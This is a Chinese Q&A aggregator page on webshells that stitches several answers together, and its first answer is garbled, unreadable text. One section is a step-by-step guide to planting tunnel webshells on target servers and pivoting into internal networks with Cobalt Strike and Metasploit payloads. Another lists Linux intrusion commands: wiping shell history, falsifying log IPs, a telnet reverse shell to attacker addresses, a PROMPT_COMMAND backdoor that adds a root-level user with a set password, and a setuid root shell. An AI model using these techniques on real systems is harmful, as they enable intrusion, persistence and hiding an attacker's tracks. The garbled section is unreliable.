导航:首页 > 编程语言 > pythonwebshell

pythonwebshell

发布时间:2024-07-27 07:49:58

python 璋冨害sell

链夊緢澶氭柟寮忥纴棣栧厛瑕佽В鍐崇殑鏄浣犲备綍浠峣链哄櫒璁块梾鍒痫链哄櫒銆
鍙浠ラ氲繃ssh锛屽彲浠ョ敤paramiko妯″潡𨱒ュ仛锛岀橱闄嗐佹墽琛屽拰锲炴樉閮芥湁渚嫔瓙锛屾瘆杈冩柟渚
鍙﹀栧彲浠ラ氲繃镊宸卞啓socket server锛岄儴缃查兘B链哄櫒涓婃帴鏀舵寚浠わ纴A链哄櫒璐熻矗璋冨害
褰撶劧http镄勬柟寮忎篃琛岋纴濡傛灉B链哄櫒涓婃湁web链嶅姟鍣锛岄偅涔堟墽琛寃ebshell涔熸槸寰堟柟渚跨殑锛屽叧阌鏄浣犺佸仛濂藉畨鍏ㄦ帾鏂斤纴渚嫔备笓闂ㄥ紑涓绔鍙g洃钖璁块梾webshell镄勮锋眰锛屽苟闄愬埗𨱒ユ簮IP銆
鏂瑰纺链夊緢澶氾纴濡傛灉鏄锅氩氭湇锷″櫒绠$悊镄勶纴浠庢晥鐜囦笂𨱒ヨ诧纴socket链浼

Ⅱ 内网渗透之http隧道

最近在整理内网渗透的一些相关资料,隧道的搭建是后渗透阶段重要的一环。随着防守的手段不断升级,某些情况下只能搭建http隧道。

简介
通过HTTP协议与代理服务器建立连接,把所有要传送的数据全部封装到HTTP协议里进行传送,协议中包含有要连接的远程主机的IP和端口,连接成功之后会返回给客户端200,表示验证通过。

获取webshell的主机位于内网,并且该内网主机的icmp、dns、tcp和udp协议等都不能出网,唯一的数据通道是webshell搭建正向代理。
根据代理的稳定性、速度推荐Neo-reGeorg、reGeorg、abptts 三款工具。

可以称为reGeorg的升级版,且传输内容经过了base64编码,避免特征检查,有效绕过检测。

https://github.com/L-codes/Neo-reGeorg

1.设置密码,生成tunnel的webshell,并上传到目标服务器。

windows上可以使用SocksCap64 或者proxifier工具配置代理。
以windows上的SocksCap64 为例,添加代理。

测试连接成功。

注意有个测试代理地址。

点击可测试。

linux上可以使用proxychains代理
编辑

添加代理IP以及端口即可。

kali本地工具就可以通过proxychains命令全部代理进内网。
注意代理不支持icmp协议。proxychains nmap -Pn -sT -sV -v -T4 IP

reGeorg 是 reDuh 的升级版。主要把内网服务器的端口通过http或https隧道转发到本机。

https://github.com/sensepost/reGeorg

1.上传tunnel.nosocket.php到目标服务器。

2.连接tunnel.nosocket.php,配置代理。

在SocksCap64 添加代理。

测试连接成功。

abptts是一款基于ssl加密的http隧道工具。全程通信数据加密有效对抗检测。

https://github.com/nccgroup/ABPTTS

1.安装python依赖库

2.本地运行,生成webshell
注意:该工具不支持php

将生成的代理脚本选择性上传到目标服务器。
返回hash值,说明代理正常执行。

建立隧道,将目标服务器的3389和本地的3389进行绑定。

远程连接本地的33389端口

另外:
冰蝎本身也有socks代理。
Tunna 也可以在内网代理中转发端口。

pystinger是通过webshell来实现内网的SOCK4代理。
使用python开发,当前支持php,jsp(x),aspx三种代理脚本。可直接用于metasploit,cobalt strike上线。

https://github.com/FunnyWolf/pystinger

1.上传proxy.jsp到目标服务器,确保可以正常访问。

2.上传stinger_server.exe 到目标服务器,并start命令运行该程序

vps 运行client端

将会在vps的6000端口启用socks4a代理

在SocksCap64 添加代理,测试一下。

配置60020端口的listener。

选择payload 生成artifact.exe,触发后即可上线。

vps可看到socks连接。

msfvenom生成60020端口的payload.exe

metasploit 配置对应的监听

将payload.exe在目标机上触发后,即可上线。

https://micro8.github.io/Micro8-HTML/Content/91-100.html
https://klionsec.github.io/2016/09/15/abptts-http-tunnel/

Ⅲ linux 怎么入侵

1,登录ssh之后不记录history
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
2. sed的一些邪恶用法
邪恶的替换到登录的IP和日志里的访问IP
sed -s ’s/211.xxx.xxx.xxx/192.168.1.1/g’ access_log access.log security
邪恶的添加ssh限制登录的用户
sed -i ’s/AllowUsers fuck root oracle/AllowUsers fuck root oracle rqcuser/g’ sshd_config
不过这个添加之后要强制重启sshd服务才可以生效
lsof -i:22 查找sshd的进程ID
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
sshd 18662 root 11u IPv6 27925867 TCP *:ssh (LISTEN)
sshd 31793 sshd 12u IPv6 34742994 TCP 192.168.1.2:ssh->192.168.1.5:49080 (ESTABLISHED)
然后
kill -SIGHUP 18662
3.通过webshell反弹shell回来之后获取真正的ttyshell
python -c ‘import pty; pty.spawn(“/bin/sh”)’
另外一种获取ttyshell的方法
$ cat sh.exp
#!/usr/bin/expect
# Spawn a shell, then allow the user to interact with it.
# The new shell will have a good enough TTY to run tools like ssh, su and login
spawn sh
interact
bash sh.exp
4.通过TELNET进行反向连接:
telnet [attacker_ipaddr] [port1] /bin/bash telnet [attacker_ipaddr] [port2]
telnet 210.51.173.41 8080 /bin/bash telnet 210.51.173.41 8081
/usr/bin/telnet 203.93.28.236 8000/bin/bash/usr/bin/telnet 203.93.28.236 8001
在203.93.28.236上面运行:
nc –l –p 8000
nc –l –p 8001
/usr/bin/telnet 192.168.1.100 8088/bin/bash/usr/bin/telnet 192.168.1.100 8089
5.curl download
The full command should look something like this:
curl -C – -O http://www.mirror.com/path/to/NeoOffice-Patch.dmg
6.Windows下面NC监听linux返回shell执行命令不能正确换行的解决办法
unalias ls
7.linux的BASH提权
export PROMPT_COMMAND=”/usr/sbin/useradd -o -u 0 kkoo &>/dev/null && echo kkoo:123456 /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND”
8.ssh tunnel
ssh -C -f -N -g -L listen_portST_HostST_port user@Tunnel_Host
ssh -C -f -N -g -R listen_portST_HostST_port user@Tunnel_Host
ssh -C -f -N -g -D listen_port user@Tunnel_Host-f
9.本地rootshell
bash和tcsh是行不通的,其他的ash bsh zsh ksh均可。具体操作比较简单,大概说一下cp /bin/ksh . ; chown root.root ksh; chmod 4755 ksh,然后执行ksh就可以获得root权限了;这一招虽然看似低俗,但某些时候还是很有用的。所以一般情况下把多余的shell删除可以在一定程度上增加黑客的入侵成本,没实施的同学可以考虑在标准化里面加入这个操作

Ⅳ web攻防,php,Linux,Python,社工等,这些什么意思

web攻防一般指网站漏洞攻击,拿站,暴库,渗透,跨站,webshell,提权,,,
php是网页网站编程语言
linux是电脑操作系统,有别于windows,mac
python简称py语言,是一种解释性编程语言,手机上涉及到不少,,,
社工全称社会工程学,是黑客作案的一种手法,社工社工吗,收集信息资料,骗取信任,,,,

Ⅳ 我想用python写个web界面简单执行远程linux命令 web界面要能自由填写执行shell命令和脚本

首先python基础你得会:
最简单套路:web用flask,linux交互用subprocessor模块
说白了就三点:python基础、flask框架、subprocessor模块

阅读全文

与pythonwebshell相关的资料

热点内容
安卓路由表怎么看 浏览:74
10个小孩分糖果python 浏览:823
安卓app小红点怎么取消 浏览:286
马哥linux面授 浏览:768
2345程序员 浏览:371
怎么开启网速显示安卓 浏览:204
索尼950app怎么样 浏览:391
计算机毕设论文源码 浏览:148
小米手机怎么下载易媒体App 浏览:191
还原系统设计可以怎样清理文件夹 浏览:670
北京时间校准服务器云服务器 浏览:844
pythonexcel数据计算 浏览:49
内医附院党建APP怎么下载 浏览:356
荣耀v20刷加密门禁卡 浏览:329
app缓冲视频怎么保存在手机 浏览:433
广度优先算法c语言 浏览:680
提高程序员竞争力 浏览:108
nfc可以开加密门卡吗 浏览:675
如何知道网页使用的服务器是什么 浏览:224
单片机接反电源会烧吗 浏览:287